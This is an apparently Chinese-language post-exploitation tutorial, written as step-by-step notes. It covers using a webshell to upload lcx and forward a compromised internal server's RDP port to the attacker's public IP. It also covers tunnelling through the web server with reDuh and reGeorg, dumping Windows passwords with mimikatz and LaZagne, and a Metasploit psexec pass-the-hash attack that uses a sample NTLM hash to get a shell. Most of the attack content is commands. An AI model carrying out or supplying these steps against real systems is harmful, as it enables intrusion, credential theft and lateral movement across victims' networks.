1.服务器处于内网如何远程连接
1.1 通过lcx工具解决内网远程连接
webshell可以执行cmd命令 通过webshell上传lcx工具到服务器 再执行以下命令将内网服务器的3389流量转发到公网IP端口上
lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389 (将本机3389端口流量转发到公网ip的2222端口上去)
然后在转发到公网的那个服务器执行以下命令
自己的电脑里面执行:lcx.exe -listen 2222 4444 (监听本地的2222端口将流量转发到4444 )
还是用菜刀演示
先将lcx上传到服务器
再用菜刀自带的虚拟终端执行命令... 菜刀不知道为啥执行不成功 换成大马执行
这个一直在转圈 但是看一下虚拟机那边 cmd已经在运行了
然后在本地监听2222 转发到4444
本地监听好 直接mstsc启动远程连接工具 连接127.0.0.1:4444
成功连接过去
2. 通过端口转发脚本实现内网远程连接
上方法需要有自己的vps 如果自己没有的话 可以通过目标服务器自带的web服务 帮助我们实现端口转发
使用的工具:reDuhGUI
先将对于的脚本上传到服务器
可以访问到 用软件连接
先点start 这个软件有的PHP版本不支持 实验用的5.3
再点create
再选择刚才添加的IP和端口 点击start
再mstsc 1270.0.1:42001
3.内网渗透 (内网到内网到内网渗透)
reGeorg+Proxifier实现内网渗透
4.直接提取本地管理员密码
使用工具1:mimikatz(2003 xp 2008)
第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpassWords //抓取密码
使用工具2:LaZagne
laZagne.exe all
获取所有密码 这个可以获取到明文密码 但是不知道为啥没有获取到
5.直接使用hash远程攻击
打开msf
msf >use exploit/windows/smb/psexec
msf >set RHOST 192.168.1.109
msf >set SMBUser administrator
msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
msf >exploit
msf >shell